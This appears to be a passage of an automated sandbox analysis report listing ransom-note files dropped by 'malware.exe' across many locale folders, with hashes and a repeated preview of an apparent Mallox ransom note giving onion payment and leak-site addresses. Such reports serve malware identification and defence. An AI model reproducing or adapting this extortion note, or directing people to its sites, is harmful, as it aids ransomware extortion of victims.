                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-JO\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-KW\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-LB\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-LY\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-MA\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-OM\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-QA\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-SA\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-SY\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-TN\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ar-YE\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\az-Latn-AZ\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\bg-BG\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\bn-BD\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\ca-ES\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\cs-CZ\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\da-DK\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\input\de-AT\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
